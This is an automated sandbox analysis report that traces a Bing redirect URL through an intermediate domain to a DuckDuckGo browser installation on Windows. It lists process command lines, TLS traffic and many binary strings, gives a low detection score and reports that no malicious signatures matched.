Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cDovL3d3dy40NDQzMTcuY29tLw#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a60
Analysis ID:1528624
Infos:

Detection

Score:3
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 4580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,5674330579086661350,10920090368458916979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cDovL3d3dy40NDQzMTcuY29tLw#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • AppInstaller.exe (PID: 1732 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca MD5: D4B46459B6A0FB33EB4690FF2B6CE2EF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://duckduckgo.com/HTTP Parser: Total embedded image size: 39250
Source: https://duckduckgo.com/#featuresHTTP Parser: Total embedded image size: 39250
Source: https://gzevp.castragouse.com/fzFA/HTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
Source: https://www.444317.com/#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/HTTP Parser: No favicon
Source: https://gzevp.castragouse.com/fzFA/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49755 version: TLS 1.0
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.114.178.124:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: Binary string: WindowsBrowser/WindowsBrowser.Privacy.pdbmWindowsBrowser/DbgX.Interfaces.Internal.dllWindowsBrowser/DbgX.Interfaces.dll.com source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB/WindowsBrowser/DuckDuckGo.Windows.pdb/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB/WindowsBrowser/DuckDuckGo.Updater.dll source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Privacy.pdb0 source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDB0K source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: S.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: uckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.UserPreferences.pdb/WindowsBrowser/DuckDuckGo.Updater.runtimeconfig.json/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.dllON/WindowsBrowser/Microsoft.ApplicationInsights.dllON source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.Wpf.pdbWindowsBrowser/DuckDuckGo.CrashReporter.pdbdbWindowsBrowser/WindowsBrowser.CrashHandler.pdbWindowsBrowser/WindowsBrowser.Bookmarks.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WebView2/telclient.dll/WindowsBrowser/WebView2/telclient.dll/WindowsBrowser/WebView2/onramp.dllLL/WindowsBrowser/WebView2/onramp.dllll/WindowsBrowser/WebView2/oneds.dllDLLWindowsBrowser/DuckDuckGo.PersonalInfoRemoval.runtimeconfig.jsonLES.PDB/WINDOWSBROWSER/WEBVIEW2/ONRAMP.DLLLL/WindowsBrowser/WebView2/vulkan-1.dll/WINDOWSBROWSER/WEBVIEW2/MOJO_CORE.DLL/WINDOWSBROWSER/WEBVIEW2/ONEDS.DLL/WINDOWSBROWSER/WEBVIEW2/ONEDS.DLL/WindowsBrowser/WebView2/ffmpeg.dll/WindowsBrowser/WebView2/msedge.dllL/WINDOWSBROWSER/WEBVIEW2/ONRAMP.DLL/WindowsBrowser/WebView2/msedge.dlll source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDB/WindowsBrowser/WindowsBrowser.Burning.pdbPF source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbed.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Privacy.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.CrashReporter.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.VPN.Tray.deps.jsonWindowsBrowser/WindowsBrowser.Privacy.pdbonWindowsBrowser/DuckDuckGo.VPN.Tray.deps.json source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: x/WindowsBrowser/fr/System.Private.ServiceModel.resources.dll|/WindowsBrowser/tr/Microsoft.CodeAnalysis.CSharp.resources.dllx/WindowsBrowser/ru/System.Windows.Forms.Design.resources.dll.pdb source: AppInstaller.exe, 00000008.00000002.3031274677.0000019EC92F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.PDB/WindowsBrowser/DuckDuckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034989049.0000019EC9981000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: w.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ER.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDB/WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDB/WindowsBrowser/WindowsBrowser.SecureStorage.pdb/WindowsBrowser/WindowsBrowser.NetworkProtection.pdbon/WindowsBrowser/WindowsBrowser.UserPreferences.pdbBb/WindowsBrowser/DuckDuckGo.VPN.Tray.runtimeconfig.json/WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDB/WindowsBrowser/DuckDuckGo.Updater.runtimeconfig.json source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W2.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Updater.pdbpdbon source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N/WindowsBrowser/WebView2/Locales/de.pakN/Images/Square150x150Logo.scale-400.pngR/WindowsBrowser/System.Runtime.Loader.dllJ/WindowsBrowser/WebView2/vulkan-1.dllN/Images/Square150x150Logo.scale-200.pngN/WindowsBrowser/WebView2/Locales/el.pakP/WindowsBrowser/WebView2/onnxruntime.dllL/WindowsBrowser/Images/TwitterDark.pngV/WindowsBrowser/Images/VerizonmediaDark.pngP/WindowsBrowser/System.Globalization.dllN/WindowsBrowser/WebView2/msedge_wer.dllV/WindowsBrowser/System.Numerics.Vectors.dllN/WindowsBrowser/WebView2/Locales/it.pakJ/Images/Square44x44Logo.scale-100.pngT/WindowsBrowser/WebView2/Locales/en-GB.pakJ/WindowsBrowser/WebView2/msvcp140.dllL/WindowsBrowser/Nito.AsyncEx.Tasks.dllT/WindowsBrowser/System.Dynamic.Runtime.dllJ/Images/Wide310x150Logo.scale-400.pngR/WindowsBrowser/System.ServiceProcess.dllJ/Images/Wide310x150Logo.scale-100.pngL/WindowsBrowser/DuckDuckGo.WebView.pdbH/WindowsBrowser/Nito.Disposables.dllM source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC9258000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.pdbWindowsBrowser/DuckDuckGo.Windows.pdbiew2.pdbWindowsBrowser/WindowsBrowser.Styles.pdbmImages/Wide310x150Logo.scale-400.png source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashReporting.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbWindowsBrowser/DuckDuckGo.VPN.Tray.pdbom source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdbP source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/NetworkProtection.Grpc.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.pdb0" source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: T/WindowsBrowser/WindowsBrowser.Privacy.pdbL/WindowsBrowser/DuckDuckGo.Updater.pdbN/WindowsBrowser/Namotion.Reflection.dll/WindowsBrowser/WindowsBrowser.Styles.dllono source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WEBVIEW2/MSVCP140_CODECVT_IDS.DLL/WINDOWSBROWSER/WEBVIEW2/NOTIFICATION_HELPER.EXEDLL/WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb/WindowsBrowser/WebView2/msvcp140_codecvt_ids.dllll source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/System.DirectoryServices.AccountManagement.dll/WindowsBrowser/Microsoft.AspNetCore.Authorization.Policy.dllL/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.json/WindowsBrowser/Grpc.AspNetCore.Server.ClientFactory.dll.pdb/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.json/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb/WINDOWSBROWSER/GRPC.ASPNETCORE.SERVER.CLIENTFACTORY.DLL.PDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Updater.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: te.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.Updater.deps.jsonDB/WindowsBrowser/Grpc.Net.ClientFactory.dll.DLL/WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDBb/WindowsBrowser/WindowsBrowser.CrashHandler.pdb/WindowsBrowser/NetworkProtection.Grpc.pdb/WindowsBrowser/WindowsBrowser.Privacy.pdbon/WINDOWSBROWSER/NETWORKPROTECTION.GRPC.PDB source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/MICROSOFT.CODEANALYSIS.CSHARP.DLLLL/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDBbb/WindowsBrowser/WindowsBrowser.Autocomplete.Public.xml/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.RUNTIMECONFIG.JSON/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WindowsBrowser/WindowsBrowser.SecureStorage.pdb.png/WindowsBrowser/DuckDuckGo.VPN.Tray.runtimeconfig.json source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.VPN.Tray.pdb/WindowsBrowser/DuckDuckGo.VPN.Tray.pdb/WINDOWSBROWSER/THEMES/DARK.XAML/WindowsBrowser/DuckDuckGo.Updater.pdb/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WindowsBrowser/DuckDuckGo.VPN.Tray.pdb/WindowsBrowser/DuckDuckGo.WebView.pdb/WindowsBrowser/DuckDuckGo.Windows.pdb/WindowsBrowser/Themes/Dark.xaml/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WINDOWSBROWSER/THEMES/LIGHT.XAML/WINDOWSBROWSER/THEMES/DARK.XAML/WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.Windows.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/NETWORKPROTECTION.GRPC.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: P/WindowsBrowser/SkiaSharp.SceneGraph.dllT/WindowsBrowser/NetworkProtection.Grpc.pdb/WindowsBrowser/WindowsBrowser.Styles.dllll source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/Themes/Light.xamlpngWindowsBrowser/DuckDuckGo.WebView.WebView2.pdbWindowsBrowser/Themes/Light.xamle.com source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ay.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.Wpf.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d/WindowsBrowser/pt-BR/PresentationUI.resources.dll^/WindowsBrowser/ko/PresentationUI.resources.dll`/WindowsBrowser/Microsoft.Extensions.Logging.dll^/WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb^/WindowsBrowser/fr/PresentationUI.resources.dll^/WindowsBrowser/cs/PresentationUI.resources.dll8& source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdb/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDB/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDBPDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WebView2/Locales/vi.pakWindowsBrowser/WebView2/Locales/zh-CN.pakWindowsBrowser/WebView2/Locales/zh-CN.pakmWindowsBrowser/WebView2/Locales/zh-TW.pakmWindowsBrowser/WindowsBrowser.SecureStorage.pdb source: AppInstaller.exe, 00000008.00000002.3033983146.0000019EC9789000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDBDB/WindowsBrowser/DuckDuckGo.CrashReporter.pdb/WINDOWSBROWSER/WINDOWSBROWSER.CRASHHANDLER.PDB/WINDOWSBROWSER/DBGX.INTERFACES.INTERNAL.DLL/WINDOWSBROWSER/DUCKDUCKGO.RUNTIMECONFIG.JSONb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.CrashReporting.pdbN.PDB/WindowsBrowser/WindowsBrowser.CrashReporting.pdb/WindowsBrowser/WebView2/msvcp140_codecvt_ids.dll/WindowsBrowser/WebView2/notification_helper.exe/WINDOWSBROWSER/WEBVIEW2/NOTIFICATION_HELPER.EXE/WINDOWSBROWSER/WEBVIEW2/MSVCP140_CODECVT_IDS.DLLLL/WindowsBrowser/WindowsBrowser.CrashReporting.pdbn.pdb/WINDOWSBROWSER/WEBVIEW2/DUAL_ENGINE_ADAPTER_X86.DLL/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WINDOWSBROWSER/WEBVIEW2/DUAL_ENGINE_ADAPTER_X64.DLL/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WindowsBrowser/WebView2/msvcp140_codecvt_ids.dll/WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDBC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDB/WindowsBrowser/WindowsBrowser.SecureStorage.pdb/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDBB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDBB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
